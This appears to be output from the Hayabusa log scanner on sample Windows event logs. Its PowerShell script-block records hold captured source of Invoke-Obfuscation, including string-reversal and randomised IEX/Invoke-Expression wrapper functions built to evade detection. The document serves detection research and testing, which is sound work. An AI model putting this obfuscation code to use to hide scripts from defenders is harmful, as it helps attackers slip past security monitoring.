$RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. $RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += '$OFS' + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""''"" $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize the case of selected variable syntaxes. 
$SetOfsVar = Out-RandomCase $SetOfsVar $SetOfsVarBack = Out-RandomCase $SetOfsVarBack $StringStr = Out-RandomCase 'string' $JoinStr = Out-RandomCase 'join' $LengthStr = Out-RandomCase 'length' $ArrayStr = Out-RandomCase 'array' $ReverseStr = Out-RandomCase 'reverse' $CharStr = Out-RandomCase 'char' $RightToLeftStr = Out-RandomCase 'righttoleft' $RegexStr = Out-RandomCase 'regex' $MatchesStr = Out-RandomCase 'matches' $ValueStr = Out-RandomCase 'value' $ForEachObject = Out-Rand",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.250 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"omCase (Get-Random -Input @('ForEach-Object','ForEach','%')) # Select random method for building command to reverse the now-reversed $ScriptString to execute the original command. Switch(Get-Random -Input (1..3)) { 1 { # 1) $StringVar = $String; $StringVar[-1..-($StringVar.Length)] -Join '' # Replace placeholder with appropriate value for this Switch statement. $RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,('""' + ' '*(Get-Random -Input @(0,1)) + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""')) # Set $ScriptStringReversed as environment variable $Random. $ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $RandomVarGet = $RandomVarGet + '[' + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '..' + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + "".$LengthStr"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ']' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. 
# Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $RandomVarGet) + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 2 { # 2) $StringVar = [Char[]]$String; [Array]::Reverse($StringVar); $StringVar -Join '' # Replace placeholder with appropriate value for this Switch statement. $RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,(""[$CharStr["" + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""')) # Set $ScriptStringReversed as environment variable $Random. 
$ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $ScriptString = $ScriptString + ' '*(Get-Random -Input @(0,1)) + ""[$ArrayStr]::$ReverseStr("" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ';' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 3 { # 3) -Join[Regex]::Matches($String,'.','RightToLeft') # Randomly choose to use 'RightToLeft' or concatenated version of this string in $JoinOptions below. 
If(Get-Random -Input (0..1)) { $RightToLeft = Out-ConcatenatedString $RightToLeftStr ""'"" } Else { $RightToLeft = ""'$RightToLeftStr'"" } # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]::$JoinStr("" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) 
+ "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + "".$ValueStr"" + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $ScriptString = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } default {Write-Error ""An invalid value was passed to switch block.""; Exit;} } # Perform final check to remove ticks if they now precede lowercase special characters after the string is reversed. # E.g. ""testin`G"" in reverse would be ""G`nitset"" where `n would be interpreted as a newline character. 
$SpecialCharacters = @('a','b','f','n','r','t','v','0') ForEach($SpecialChar in $SpecialCharacters) { If($ScriptString.Contains(""``""+$SpecialChar)) { $ScriptString = $ScriptString.Replace(""``""+$SpecialChar,$SpecialChar) } } Return $ScriptString } Function Out-EncapsulatedInvokeExpression { <# .SYNOPSIS HELPER FUNCTION :: Generates random syntax for invoking input PowerShell command. Invoke-Obfuscation Function: Out-EncapsulatedInvokeExpression Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncapsulatedInvokeExpression generates random syntax for invoking input PowerShell command. It uses a combination of IEX and Invoke-Expression as well as ordering (IEX $Command , $Command | IEX). .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-EncapsulatedInvokeExpression {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green|Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # The below code block is copy/pasted into almost every encoding function so they can maintain zero dependencies and work on their own (I admit using this bad coding practice). # Changes to below InvokeExpressionSyntax block should also be copied to those functions. # Generate random invoke operation syntax. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. 
$InvokeExpression = Out-RandomCase $InvokeExpression # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $ScriptString = (Get-Random -Input $InvokeOptions) Return $ScriptString }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.250 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"omCase (Get-Random -Input @('ForEach-Object','ForEach','%')) # Select random method for building command to reverse the now-reversed $ScriptString to execute the original command. Switch(Get-Random -Input (1..3)) { 1 { # 1) $StringVar = $String; $StringVar[-1..-($StringVar.Length)] -Join '' # Replace placeholder with appropriate value for this Switch statement. $RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,('""' + ' '*(Get-Random -Input @(0,1)) + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""')) # Set $ScriptStringReversed as environment variable $Random. $ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $RandomVarGet = $RandomVarGet + '[' + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '..'
+ ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + "".$LengthStr"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ']' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $RandomVarGet) + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 2 { # 2) $StringVar = [Char[]]$String; [Array]::Reverse($StringVar); $StringVar -Join '' # Replace placeholder with appropriate value for this Switch statement. 
$RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,(""[$CharStr["" + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""')) # Set $ScriptStringReversed as environment variable $Random. $ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $ScriptString = $ScriptString + ' '*(Get-Random -Input @(0,1)) + ""[$ArrayStr]::$ReverseStr("" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ';' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). 
$JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 3 { # 3) -Join[Regex]::Matches($String,'.','RightToLeft') # Randomly choose to use 'RightToLeft' or concatenated version of this string in $JoinOptions below. If(Get-Random -Input (0..1)) { $RightToLeft = Out-ConcatenatedString $RightToLeftStr ""'"" } Else { $RightToLeft = ""'$RightToLeftStr'"" } # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]::$JoinStr("" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' 
'*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + "".$ValueStr"" + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $ScriptString = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). 
$ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } default {Write-Error ""An invalid value was passed to switch block.""; Exit;} } # Perform final check to remove ticks if they now precede lowercase special characters after the string is reversed. # E.g. ""testin`G"" in reverse would be ""G`nitset"" where `n would be interpreted as a newline character. $SpecialCharacters = @('a','b','f','n','r','t','v','0') ForEach($SpecialChar in $SpecialCharacters) { If($ScriptString.Contains(""``""+$SpecialChar)) { $ScriptString = $ScriptString.Replace(""``""+$SpecialChar,$SpecialChar) } } Return $ScriptString } Function Out-EncapsulatedInvokeExpression { <# .SYNOPSIS HELPER FUNCTION :: Generates random syntax for invoking input PowerShell command. Invoke-Obfuscation Function: Out-EncapsulatedInvokeExpression Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncapsulatedInvokeExpression generates random syntax for invoking input PowerShell command. It uses a combination of IEX and Invoke-Expression as well as ordering (IEX $Command , $Command | IEX). .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-EncapsulatedInvokeExpression {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green|Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
